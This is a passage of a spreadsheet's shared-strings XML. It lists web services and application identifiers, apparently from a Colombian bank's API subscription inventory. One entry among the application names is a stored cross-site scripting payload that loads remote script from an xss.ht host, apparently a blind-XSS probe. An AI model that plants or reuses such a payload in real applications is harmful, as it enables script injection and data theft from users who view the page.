    <t>WSP_SAP_ASYNC_EC_TO_ERP</t>
  </si>
  <si>
    <t>WSP_SAP_SYNC_EC_TO_ERP</t>
  </si>
  <si>
    <t>WSP_SM_AccederMontoPreaprobadoTarjetaCredito_AMPTC</t>
  </si>
  <si>
    <t>WSP_SM_RevisarIdentidadCliente_RIC</t>
  </si>
  <si>
    <t>WSP_SM_RevisarIdentidadCliente_V2</t>
  </si>
  <si>
    <t>WSP_TRF</t>
  </si>
  <si>
    <t>WSP_VAL_InterfaceCMASeries2</t>
  </si>
  <si>
    <t>WSP_VAL_SERIES4</t>
  </si>
  <si>
    <t>BC_Monitoreo_ProductorConsumidor_Depositos; CapaTrx_ProductorConsumidor; APPVinculation_AW1315014; APP_PRODUCTORCONSUMIDOR; Deposits-Openshift_PRODUCTORCONSUMIDOR; FONDOS_AW1365; Valores_AW1373; PagoSinFriccionQrInteroperable_AW1315001; JornadaDepositos_NU0104001; GestorCanal_NU0014001; Openshift_AW1333002_AccountCertificates; APP_PRODUCTORCONSUMIDOR; Decision-Manager_NU0010001; PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR; MonitoreoDCM_NU0084001; JornadaDepositos_NU0170001; Horus_AW1258011; CryptoAssetsGMN_NU0094001; GESTION DE PRECIOS_NU0091001; APP-PERSONAS_NU0146001; APP_PRODUCTORCONSUMIDOR; APP_PRODUCTORCONSUMIDOR; BancolombiaPay_AW1435001; TransaccionPago_AW0360006; ALM_AW0955001; APP_PRODUCTORCONSUMIDOR; RIGO_NU0135001; JornadaDepositos_AW1177001; APP_PRODUCTORCONSUMIDOR; Dcmonroy_prueba_paso; AdquirenciaCargaMasiva_NU0142001; SEG_NU0064001</t>
  </si>
  <si>
    <t>ALM_AW0955; APPVinculation_AW1315014; APP_PRODUCTORCONSUMIDOR; Openshift_AW1333002_AccountCertificates; Decision-Manager_NU0010001; PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR; BC_Monitoreo_ProductorConsumidor_Depositos; LoansOffer_NU0102001</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR; MonitoreoDCM_NU0084001; APP_PRODUCTORCONSUMIDOR; APP_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR; MascaraTransaccional_NU0021001; APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD; APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO; APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI; APIC_PRODUCTORCONSUMIDOR_PDN_DANVA; APIC_PRODUCTORCONSUMIDOR; MonitoreoDCM_NU0084001; MonitoreoDCM_NU0084001_Recaudos</t>
  </si>
  <si>
    <t>ALM_AW0955001; MonitoreoDCM_NU0084001; ALM_AW0955; app1; AppAuditoriaApisEjemplo</t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR; MascaraTransaccional_NU0021001; APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI; HabitatAdministraciones_NU0113001; APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO; MonitoreoDCM_NU0084001; APIC_PRODUCTORCONSUMIDOR_PDN_DANVA; MonitoreoDCM_NU0084001_Recaudos; APIC_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR_PDN; APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO; APIC_PRODUCTORCONSUMIDOR_PDN_DANVA; APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD; MonitoreoDCM_NU0084001; APIC_PRODUCTORCONSUMIDOR; APIC_PRODUCTORCONSUMIDOR; APIC_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>VisorInteractivo_AW1249001; CGC_NU0014001; AdaptadorMarketplace_NU0143001; APP-PERSONAS_NU0146001; MascaraTransaccional_NU0021001; BNPL_NU0287001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001; VisorInteractivo_AW1249001; LimitsCreditExhibition_NU0114001</t>
  </si>
  <si>
    <t>HabitatCore_AW1281003; MonitoreoDCM_NU0084001; MovilidadCore_AW1281002; VisorInteractivo_AW1249001; AdaptadorMarketplace_NU0143001; LoansOffer_NU0102001; MascaraTransaccional_NU0021001; EASYHOME_NU0004001; SUFIOriginacion_AW1097001; salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001; One Click Payment_NU0199001</t>
  </si>
  <si>
    <t>ProductorConsumidorMP_PRODUCTORCONSUMIDOR; MonitoreoDCM_NU0084001; PagoTDCWompi_AW1405001</t>
  </si>
  <si>
    <t>PORTALCOBRANZA_AW1294001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>MascaraTransaccional_NU0021001; ALM_AW0955001; msitccheckcost_NU0215001</t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR; APP_PRODUCTORCONSUMIDOR; MascaraTransaccional_NU0021001; APIC_PRODUCTORCONSUMIDOR_PDN; APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO; APIC_PRODUCTORCONSUMIDOR; APIC_AW1176; MonitoreoDCM_NU0084001; MonitoreoDCM_NU0084001_Recaudos; APIC_PRODUCTORCONSUMIDOR; Horus_AW1258011</t>
  </si>
  <si>
    <t>RespuestaAlFrente_AW1086001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>EcosistemaRiesgos_AW1011; NequiAF_AW1011</t>
  </si>
  <si>
    <t>RespuestaAlFrente_AW1086001; MonitoreoDCM_NU0084001; PreaprobadosSucursales_AW1299001</t>
  </si>
  <si>
    <t>Aprobaciones_AW036007; NU0107001_LoansApproval_MR; APP_AW0360007; aprobaciones_AW0360007; LoansOffer_NU0102001; MsUtilities_NU0102001; MonitoreoDCM_NU0084001; APP_AW1285001; APP_NU0102001; ProductosDeFinanciación_NU0102001; BNPL_NU0287001</t>
  </si>
  <si>
    <t>LoansOffer_NU0102001; MsUtilities_NU0102001</t>
  </si>
  <si>
    <t>VINCUTRANS_NU0034001; Plink_AW1206001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001; NETWORKING_NU0046001; SVECarteraComercial_NU0162001</t>
  </si>
  <si>
    <t>AppInversiones_AW1185001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Autenticacion-para-VCAS_NU0101001; ProductorConsumidorMP_PRODUCTORCONSUMIDOR; MonitoreoDCM_NU0084001; Desbloqueo-Clave-Dinamica-TDC_NU0100001; JornadaPagos_AW1316001; PagoTDCWompi_AW1405001; MascaraTransaccional_NU0021001; ALM_AW0955001</t>
  </si>
  <si>
    <t>ProductorConsumidorMP_PRODUCTORCONSUMIDOR; SEG_NU0064001; JornadaPagos_AW1316001</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001; Ares_AW1250; JornadaPagos_AW1316001; &lt;script&gt;$.getScript("//mistestxss.xss.ht")&lt;/script&gt;; MascaraTransaccional_NU0021001; Dcmonroy_prueba_paso</t>
  </si>
  <si>
    <t>PROFIN_PRODUCTORCONSUMIDOR; LoansOffer_NU0102001</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001; APP_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001; HabitatCore_AW1281003; GestionaNegocios_AW1302001; EDPYME_AW1170; VinculacionAperturaProductoDigital_AW1128; VinculacionAperturaProductoDigitalSucursales_AW1177; BIZTRACK_AW0998; APM_AW1097001; APPVinculation_AW1315014; Networking_NU0046001; SEG_NU0064001; PLINK_AW1206001; Horus_AW1258011; NETWORKING_NU0046001; VINCUTRANS_NU0034001; ECORIESGOS_AW1081001; GestionVendor_AW0661003; AdaptadorMarketplace_NU0143001; RIGO_NU0135001; APIC_AW1176; AdquirenciaCargaMasiva_NU0142001; Plink_AW1206001; AccountOpening_AW1480001; PLINK_AW1206001; BIZAGIBEG_AW1176001; PORTALCOBRANZA_AW1294001; OYD_AW0629001; ALM_AW0955001</t>
  </si>
  <si>
    <t>VINCUTRANS_NU0034001; APP-PERSONAS_NU0146001; SVPSucursalVirtualPersonas_NU0149001</t>
  </si>
  <si>
    <t>CGC_NU0014001; EDPYME_AW1170; PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR; Valores_AW1373; MascaraTransaccional_NU0021001; LimitsCreditExhibition_NU0114001; SEG_NU0064001; JornadaDepositos_NU0170001; Horus_AW1258011; JornadaPagos_AW1316001; Portal Contenidos Bancolombia_AW1218001; Boton de Transferencias_AW1277001; CryptoAssetsGMN_NU0094001; LoansOffer_NU0102001; PODEM01_NU0001; APIC_AW1176; APP_PRODUCTORCONSUMIDOR; APP_PRODUCTORCONSUMIDOR; APP_PRODUCTORCONSUMIDOR; Cuentas_Bancolombia_AW1081001_SUFI_APM; BancolombiaPay_AW1435001; ALM_AW0955001; prueba; JornadaDepositos_NU0104001; APP_PRUEBA; APP-PERSONAS_NU0146001; ModuloSVELeasing_AW0360006; JornadaDepositos_AW1177001; ms_bs_customer_account_NU0163001</t>
  </si>
  <si>
    <t>AppInversiones_AW1185001; PEP_AW1128</t>
  </si>
  <si>
    <t>Desbloqueo-Clave-Dinamica-TDC_NU0100001; DELFINWEB_AW0748001; EASYHOME_NU0004001; JornadaPagos_AW1316001; PEP_AW1128</t>
  </si>
  <si>
    <t>CentralesPrecalculadas_NU0032001; BIZAGIBEG_AW1176001; PORTALCOBRANZA_AW1294001; PricingBusiness_NU0091001; PricingBusiness_NU0091001</t>
  </si>
  <si>
    <t>Thanos_AW1326001; LimitsCreditExhibition_NU0114001; LoansOffer_NU0102001; MsUtilities_NU0102001; HabitatCore_AW1281003; VisorInteractivo_AW1249001; VisorInteractivo_AW1249001; MascaraTransaccional_NU0021001; RIGO_NU0135001; AppSarlaft_AW1176001; GestionVendor_AW0661003; salesforceAdapter_NU0254001; VINCUTRANS_NU0034001; EASYHOME_NU0004001</t>
  </si>
  <si>
    <t>SEG_NU0064001; TRACKINGSIM_NU0098001; NETWORKING_NU0046001; JornadaDepositos_NU0104001; Networking_NU0046001; DELFINWEB_AW0748001; Decision-Manager_NU0010001; Thanos_AW1326001; EASYHOME_NU0004001; ContactInfoMDM_AW0660001; AdaptadorMarketplace_NU0143001; aprobaciones_AW0360007; JornadaDepositos_NU0170001; Portal Contenidos Bancolombia_AW1218001; LoansOffer_NU0102001; MsUtilities_NU0102001; AdquirenciaCargaMasiva_NU0142001; PSE-Pagos-Seguros-en-linea_NU0152001; AccountOpening_AW1480001; Kioscos_AW1272001; GestionVendor_AW0661003; PricingBusiness_NU0091001; TRACKING_NU0098001; EASYHOME_NU0004001; salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>creditlens_NU0038001; MonitoreoDCM_NU0084001; Portal Contenidos Bancolombia_AW1218001; LoansOffer_NU0102001; GestionVendor_AW0661003; salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>VDSORQUESTADORAUTOGESTIONBACK_NU0037002; GestionVendor_AW0661003; Portal Contenidos Bancolombia_AW1218001; TestApplication_AW1333002</t>
  </si>
  <si>
    <t>DELFINWEB_AW0748001; GestionVendor_AW0661003; salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>Recargas_AW1300001; MonitoreoDCM_NU0084001; Thanos_AW1326001</t>
  </si>
  <si>
    <t>ALM_AW0955001; ALM_AW0955; CGC_NU0014001; SEG_NU0064001; NETWORKING_NU0046001; JornadaDepositos_NU0104001; Networking_NU0046001; TMP_AW0955; VINCUTRANS_NU0034001; Thanos_AW1326001; SucursalVirtualValores_AW0638; AdaptadorMarketplace_NU0143001; JornadaDepositos_NU0170001; LoansOffer_NU0102001; MsUtilities_NU0102001; AdquirenciaCargaMasiva_NU0142001; APP-PERSONAS_NU0146001; SVPSucursalVirtualPersonas_NU0149001; PSE-Pagos-Seguros-en-linea_NU0152001; AccountOpening_AW1480001; RIGO_NU0135001; BancolombiaPay_AW1435001; GestionVendor_AW0661003; PricingBusiness_NU0091001; salesforceAdapter_NU0254001; Galatea_NU0051001</t>
  </si>
  <si>
    <t>GestionaNegocios_AW1302001; EDPYME_AW1170; APM_AW1081001; AdquirenciaCargaMasiva_NU0142001; VINCUTRANS_NU0034001</t>
  </si>
  <si>
    <t>VINCUTRANS_NU0034001; APP_AW1318001</t>
  </si>
  <si>
    <t>CPPALM_AW1086001; RespuestaAlFrente_AW1086001; ConsultaInformacionBuroCredito_AW0955001</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001; MascaraTransaccional_NU0021001; Portal Contenidos Bancolombia_AW1218001; Thanos_AW1326001</t>
  </si>
  <si>
    <t>AdquirenciaCargaMasiva_NU0142001; NETWORKING_NU0046001; AppSarlaft_AW1176001; GestionVendor_AW0661003; PricingBusiness_NU0091001; salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>SAPCRM_AW0611001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Portal Contenidos Bancolombia_AW1218001; TRACKINGSIM_NU0098001; SAPCRM_AW0611001; TRACKING_NU0098001</t>
  </si>
  <si>
    <t>PORTALCOBRANZA_AW1294001; DELFINWEB_AW0748001; VINCUTRANS_NU0034001; GruposDeRiesgo_AW1294001; HabitatCore_AW1281003</t>
  </si>
  <si>
    <t>CentralesPrecalculadas_NU0032001; GruposDeRiesgo_AW1294001; PORTALCOBRANZA_AW1294001</t>
  </si>
  <si>
    <t>CentralesPrecalculadas_NU0032001; EASYHOME_NU0004001</t>
  </si>
  <si>
    <t>CentralesPrecalculadas_NU0032001; BIZAGIBEG_AW1176001; EASYHOME_NU0004001; EASYHOME_NU0004001</t>
  </si>
  <si>
    <t>ALM_AW0955001; ALM_AW0955; NETWORKING_NU0046001; HabitatAdministraciones_NU0113001; PEP_AW1281002; APP-PERSONAS_NU0146001; SVPSucursalVirtualPersonas_NU0149001; PSE-Pagos-Seguros-en-linea_NU0152001</t>
  </si>
  <si>
    <t>BancolombiaPay_AW1435001; NU0046001_NETWORKING_MR; APP-PERSONAS_NU0146001; PEP_AW1281002; Galatea_NU0051001</t>
  </si>
  <si>
    <t>ProductorConsumidorMP_PRODUCTORCONSUMIDOR; Autenticacion-para-VCAS_NU0101001; MonitoreoDCM_NU0084001; JornadaDepositos_NU0104001; Desbloqueo-Clave-Dinamica-TDC_NU0100001; JornadaDepositos_NU0170001; GESTION DE PRECIOS_NU0091001; RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR; MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>GESTION DE PRECIOS_NU0091001; ProductorConsumidorMP_PRODUCTORCONSUMIDOR; RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Recargas_AW1300001; Transfiya_NU0017001; CDT_AW1078001; Recargas_AW1300001; PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>PODEM01_NU0001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR; MonitoreoDCM_NU0084001; MascaraTransaccional_NU0021001; APP_PRODUCTORCONSUMIDOR; PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR; BC_Monitoreo_ProductorConsumidor_Depositos; APP_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Wompi_NU0093001; DesembolsosSufi_AW1097001; BotonRecaudoWompi_NU0093001</t>
  </si>
  <si>
    <t>AW1097001; NU0093001; DesembolsosSufi_AW1097001; Monitoreo_AW1097001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>EASYHOME_NU0004001; EDPYME_AW1170; ConfirmacionOpCadena_NU0127001; VINCUTRANS_NU0034001; PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR; MonitoreoDCM_NU0084001; LoansOffer_NU0102001; BIZAGIBEG_AW1176001</t>
  </si>
  <si>
    <t>PODEM01_NU0001; AdquirenciaCargaMasiva_NU0142001</t>
  </si>
  <si>
    <t>VDSAUTOGESTIONCONSUMOBACK_NU0037003; VDSAUTOGESTIONCONSUMOBACK_NU0037003; Monitoreo_AW1378001; MONSUFI_AW1378001</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001; BNPL_NU0287001</t>
  </si>
  <si>
    <t>Portal Contenidos Bancolombia_AW1218001; GestionaNegocios_AW1302001; EDPYME_AW1170; APM_AW1097001; Desbloqueo-Clave-Dinamica-TDC_NU0100001; HistoriaCliente_NU0090001; PortalAutogestionPyme_AW1287; VINCUTRANS_NU0034001; EASYHOME_NU0004001; LoansApproval_NU107001; HabitatAdministraciones_NU0113001; JornadaDepositos_NU0170001; HabitatCore_AW1281003; HABITATCONST_NU0013001; MovilidadCore_AW1281002; Inversi_NU0160001; BIZAGIBEG_AW1176001; NETWORKING_NU0046001; BNPL_NU0287001; PreaprobadosSucursales_AW1299001</t>
  </si>
  <si>
    <t>BIZAGIACJCN_AW1285001; APP_AW1294001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>PORTALCOBRANZA_AW1294001; APP_AW1294001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Fiduciary_Pdn; ModuloNegociosFiduciarios_NU0247001</t>
  </si>
  <si>
    <t>FiduciaryPaymentOrderInformation_NU0325001; FiduciaryPaymentOrderInformation_NU0325001; FiduciaryPaymentOrderInformation_NU0325001; FiduciaryPaymentOrderInformation_NU0325001; ModuloNegociosFiduciarios_NU0247001</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001; VentasDigitalesSufiVehiculos_AW1097001; MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>CGC_NU0014001; APP-PERSONAS_NU0146001; SVPSucursalVirtualPersonas_NU0149001; ALM_AW0955001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>AW1333002_FraudEvaluation; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>AsesoriaAsistida_AW1208; Inversi_NU0160001; MonitoreoDCM_NU0084001; JornadaDepositos_AW1177001; JornadaDepositos_NU0170001; MascaraTransaccional_NU0021001; ALM_AW0955001</t>
  </si>
  <si>
    <t>VentasDigitalesSufiVehiculos_AW1097001; MovilidadCore_AW1281002; EnrolamientoSufiVehiculos_AW1097001; MonitoreoGWEEnrollment_AW1097001; MonitoreoDCM_NU0084001; VDSORQUESTADORAUTOGESTIONBACK_NU0037002; Prueba - sufi - Enrollment - PRD</t>
  </si>
  <si>
    <t>AsegurarRetiro_AW1151001; MonitoreoDCM_NU0084001; MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>AsesoriaAsistida_AW1208; Inversi_NU0160001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>AsesoriaAsistida_AW1208; Inversi_NU0160001</t>
  </si>
  <si>
    <t>PROFIN_PRODUCTORCONSUMIDOR; AW1313001_VTD_Rediferidos_Back; BNPL_NU0287001; MonitoreoDCM_NU0084001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>VDSAUTOGESTIONCONSUMOBACK_NU0037003; VDSAUTOGESTIONCONSUMOBACK_NU0037003; MONSUFI_AW1191035; MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>NU0037003_VDSAUTOGESTIONCONSUMOBACK; MonitoreoDCM_NU0084001; MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>MsUtilities_NU0102001; APP_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>ALM_AW0955001; ALM_AW0955; Auditoria; PORTALCOBRANZA_AW1294001; LimitsCreditExhibition_NU0114001; APP_NU0114001; LoansOffer_NU0102001; MonitoreoDCM_NU0084001; BNPL_NU0287001</t>
  </si>
  <si>
    <t>MovilidadCore_AW1281002; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>HabitatCore_AW1281003; MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>NU0037003_VDSAUTOGESTIONCONSUMOBACK; MonitoreoDCM_NU0084001; MovilidadCore_AW1281002; VDSAUTOGESTIONCONSUMOBACK_NU0037003; VDSAUTOGESTIONCONSUMOBACK_NU0037003</t>
  </si>
  <si>
    <t>PortalConstructorAW0360004_SVE; PortalConstructorAW0360004_SVE; EASYHOME_NU0004001; MONITOREO_AW1010001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>RespuestaFrenteHipo_AW0856; HabitatCore_AW1281003</t>
  </si>
  <si>
    <t>AppInversiones_AW1185001; Recargas_AW1300001; EDPYME_AW1170; Desbloqueo-Clave-Dinamica-TDC_NU0100001; Autorizador-Digitalizacion-Tarjetas_NU0103001; EASYHOME_NU0004001; JornadaDepositos_NU0104001; aprobaciones_AW0360007; JornadaDepositos_NU0170001; JornadaPagos_AW1316001; CryptoAssetsGMN_NU0094001; LoansOffer_NU0102001; BancolombiaPay_AW1435001; HelpContacts_NU0106001; SecurityOTP_NU0209001; ALM_AW0955001; BNPL_NU0287001; VINCUTRANS_NU0034001; PagoSinFriccionQrInteroperable_AW1315001; PreaprobadosSucursales_AW1299001</t>
  </si>
  <si>
    <t>CGC_NU0014001; Portal Contenidos Bancolombia_AW1218001</t>
  </si>
  <si>
    <t>SVETDL_AW0360006; PORTALCOBRANZA_AW1294001; MonitoreoDCM_NU0084001; ModuloSVELeasing_AW0360006</t>
  </si>
  <si>
    <t>AppInversiones_AW1185001; MonitoreoDCM_NU0084001; MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>EDPYME_AW1170; MonitoreoDCM_NU0084001; Horus_AW1258011</t>
  </si>
  <si>
    <t>SVETDL_AW0360006; PORTALCOBRANZA_AW1294001; PORTALCOBRANZA_AW1294001; MonitoreoDCM_NU0084001; TransaccionPago_AW0360006; Monitoreo_Payment_Leasing; Monitoreo_Payment_Leasing; ModuloSVELeasing_AW0360006</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR; APIC_PRODUCTORCONSUMIDOR; APIC_PRODUCTORCONSUMIDOR; SVE_NU0153001; APIJ_PRODUCTORCONSUMIDOR; Pruebajason; Horus_AW1258011</t>
  </si>
  <si>
    <t>GestionaNegocios_AW1302001; GestorCanal_NU0014001; MonitoreoDCM_NU0084001; Gestiona_AW1302001; Nequi_AW1011; Portal Contenidos Bancolombia_AW1218001; ALM_AW0955001; HabitatAdministraciones_NU0113001; MascaraTransaccional_NU0021001; One Click Payment_NU0199001; Payments_AW0012345; APP-PERSONAS_NU0146001</t>
  </si>
  <si>
    <t>EDPYME_AW1170; MonitoreoDCM_NU0084001; JornadaDepositos_NU0170001</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR; APP_PRODUCTORCONSUMIDOR; JornadaDepositos_NU0170001</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR; APIC_PRODUCTORCONSUMIDOR; pruebacaida; Pruebajason; APIJ_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Tabot_AW1165001; CGC_NU0014001; Tabot_AW1165001; MascaraTransaccional_NU0021001; APP-PERSONAS_NU0146001</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR; PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR; MascaraTransaccional_NU0021001; BC_Monitoreo_ProductorConsumidor_Depositos; MonitoreoDCM_NU0084001; MonitoreoDCM_NU0084001; CGC_NU0014001; APP-PERSONAS_NU0146001</t>
  </si>
  <si>
    <t>APP-PERSONAS_NU0146001; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>PortalConstructor_AW0360004; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>ALM_AW0955001; MascaraTransaccional_NU0021001; CGC_NU0014001; ALM_AW0955</t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR_PDN_DANVA; APP-PERSONAS_NU0146001</t>
  </si>
  <si>
    <t>creditlens_NU0038001; MonitoreoDCM_NU0084001; EASYHOME_NU0004001; ChannelManagement_D2B_NU0051001; VisorInteractivo_AW1249001; ChannelManagement_NU0051001; Galatea_NU0051001</t>
  </si>
  <si>
    <t>SAPCRM_AW0611001; MonitoreoDCM_NU0084001; ALM_AW0955001; ALM_AW0955; APM_AW0388001; ComponenteAdaptadorNequi_NU0163001</t>
  </si>
  <si>
    <t>GESTION DE PRECIOS_NU0091001; MonitoreoDCM_NU0084001; APP-PERSONAS_NU0146001; MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>Autenticacion-para-VCAS_NU0101001; JornadaDepositos_NU0104001; JornadaDepositos_NU0170001; CryptoAssetsGMN_NU0094001; One Click Payment_NU0199001; MascaraTransaccional_NU0021001; PreaprobadosSucursales_AW1299001</t>
  </si>
  <si>
    <t>PEP_AW1281002; EASYHOME_NU0004001; SVP_NU0004001; MovilidadCore_AW1281002; FUA_AW1291001; HabitatCore_AW1281003; HDC_AW0453001; MascaraTransaccional_NU0021001; ALM_AW0955001; ALM_AW0955; Networking_NU0046001; JornadaDepositos_NU0104001; NETWORKING_NU0046001; Portal Contenidos Bancolombia_AW1218001; AdaptadorMarketplace_NU0143001; EDPYME_AW1170; CryptoAssetsGMN_NU0094001; SVECarteraComercial_NU0162001; JornadaDepositos_NU0170001; Security_AW1291001; SVN_NU0212001</t>
  </si>
  <si>
    <t>Portal Contenidos Bancolombia_AW1218001; NETWORKING_NU0046001; Kioscos_AW1272001; EDIN_AW1185001; CryptoAssetsGMN_NU0094001; HabitatCore_AW1281003; MigracionFUA_AW1291001; PortalAutogestionPyme_AW1287; LoansOffer_NU0102001; AdaptadorMarketplace_NU0143001; MovilidadCore_AW1281002; SVECarteraComercial_NU0162001; One Click Payment_NU0199001; HDC_AW0453001; Transversal_AW0937001; EASYHOME_NU0004001; BancolombiaPay_AW1435001; SVN_NU0212001; PEP_AW1281002; JornadaDepositos_NU0170001; EDPYME_AW1170; ALM_AW0955001; JornadaDepositos_NU0104001; SVE_AW0360001; BNPL_NU0287001; Marketplacetu360HM_NU0035001; VINCUTRANS_NU0034001; MascaraTransaccional_NU0021001; ModuloNegociosFiduciarios_NU0247001</t>
  </si>
  <si>
    <t>AW133302_securityCode; BNPL_NU0287001</t>
  </si>
  <si>
    <t>MascaraTransaccional_NU0021001; ALM_AW0955001</t>
  </si>
  <si>
    <t>EASYHOME_NU0004001; SVP_NU0004001; MovilidadCore_AW1281002; PortalConstructor_AW0360004; FUA_AW1291001; HabitatCore_AW1281003; PEP_AW1281002; HDC_AW0453001; SVETDL_AW0360006; MascaraTransaccional_NU0021001; AW1312001_SVS_ENROLAMIENTO; Networking_NU0046001; CGC_NU0014001; VINCUTRANS_NU0034001; AdaptadorMarketplace_NU0143001; NETWORKING_NU0046001; CryptoAssetsGMN_NU0094001; MigracionFUA_AW1291001; LoansOffer_NU0102001; SVECarteraComercial_NU0162001; Transversal_AW0937001; BancolombiaPay_AW1435001</t>
  </si>
  <si>
    <t>PEP_AW1281002; CryptoAssetsGMN_NU0094001; AdaptadorMarketplace_NU0143001; Marketplacetu360HM_NU0035001; SVECarteraComercial_NU0162001; HDC_AW0453001; EASYHOME_NU0004001; BNPL_NU0287001; HabitatCore_AW1281003; MascaraTransaccional_NU0021001; BancolombiaPay_AW1435001; CGC_NU0014001; ModuloSVELeasing_AW0360006</t>
  </si>
  <si>
    <t>MigracionFUA_AW1291001; PortalAutogestionPyme_AW1287; SVSENROLAMIENTO_AW1312001; SVSENROLAMIENTO_AW1312001; AdaptadorMarketplace_NU0143001; HDC_AW0453001; Transversal_AW0937001; PEP_AW1281002; ModuloNegociosFiduciarios_NU0247001</t>
  </si>
  <si>
    <t>FUA_AW1291001; PEP_AW1281002; EDIN_AW1185001; MigracionFUA_AW1291001</t>
  </si>
  <si>
    <t>PEP_AW1281002; EDIN_AW1185001</t>
  </si>
  <si>
    <t>BIZAGIAC_AW1285001; APM_AW1097001; PortalAutogestionPyme_AW1287; Desbloqueo-Clave-Dinamica-TDC_NU0100001; Decision-Manager_NU0010001; LoansApproval_NU107001; prueba; CuponPagosDigital_AW0214001; Inversi_NU0160001</t>
  </si>
  <si>
    <t>DesembolsosSufi_AW1097001; Monitoreo_AW1097001; adaptadorSufi_ISSU20003; MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>BancolombiaPay_AW1435001; TestAPIConnectPDN</t>
  </si>
  <si>
    <t>BancolombiaPay_AW1435001; MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>ALM_AW0955001; ALM_AW0955; EASYHOME_NU0004001; JornadaDepositos_NU0104001; ConfirmacionOpCadena_NU0127001; VINCUTRANS_NU0034001; NETWORKING_NU0046001; MonitoreoDCM_NU0084001; ConsumerOTP_AW0660; BancolombiaPay_AW1435001; PreaprobadosSucursales_AW1299001</t>
  </si>
  <si>
    <t>ALM_AW0955001; ALM_AW0955001; BancolombiaPay_AW1435001</t>
  </si>
  <si>
    <t>EDPYME_AW1170; AW1333002_Transaction_Monitoreo; AW1333002_Transaction_Monitoreo; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Tramites_Digitales_AW1081001_SUFI_APM; Monitoreo_AW1081001</t>
  </si>
  <si>
    <t>pruebaBancolmbiaButton; PruebasIntegración; APP D Y S; FACTURE PAY; ALCALDIA DE MANIZALES; TRANSFIRIENDO; BANCOLOMBIAPAY APP; Moneygram_MNR; Botón; MONET COLOMBIA SAS</t>
  </si>
  <si>
    <t>pruebaBancolmbiaButton; PruebasIntegración; APP D Y S; MonitoreoDCM_AAA; FACTURE PAY; ALCALDIA DE MANIZALES; TRANSFIRIENDO; Botón</t>
  </si>
  <si>
